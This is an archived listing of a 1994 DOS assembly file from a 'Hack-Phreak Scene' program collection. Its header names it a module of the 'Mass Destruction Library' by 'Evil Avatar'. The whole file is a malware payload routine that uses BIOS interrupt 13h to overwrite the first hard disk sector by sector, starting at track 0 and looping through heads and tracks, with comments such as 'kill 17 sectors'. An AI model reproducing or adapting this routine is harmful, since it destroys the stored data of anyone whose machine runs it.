home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / LAVIUPD3.ZIP / LAVI13.ZIP / RIP_HD.RTN < prev    next >
Text File  |  1994-01-06  |  779b  |  23 lines

  1. ;RIP_HD - module for Mass Destruction Library
  2. ;written by Evil Avatar
  3. ; Destruye el HD
  4.  
  5. rip_hd:
  6.         xor dx, dx            ;clear dx
  7. rip_hd1:        
  8.         mov cx, 1             ;track 0, sector 1
  9.         mov ax, 311h          ;17 secs per track (hopefully!)
  10.         mov dl, 80h
  11.         mov bx, 5000h
  12.         mov es, bx
  13.         int 13h               ;kill 17 sectors
  14.         jae rip_hd2           
  15.         xor ah, ah
  16.         int 13h               ;reset disks if needed
  17. rip_hd2:
  18.         inc dh                ;increment head number
  19.         cmp dh, 4             ;if head number is below 4 then
  20.         jb rip_hd1            ;go kill another 17 sectors
  21.         inc ch                ;increase track number and
  22.         jmp rip_hd            ;do it again
  23.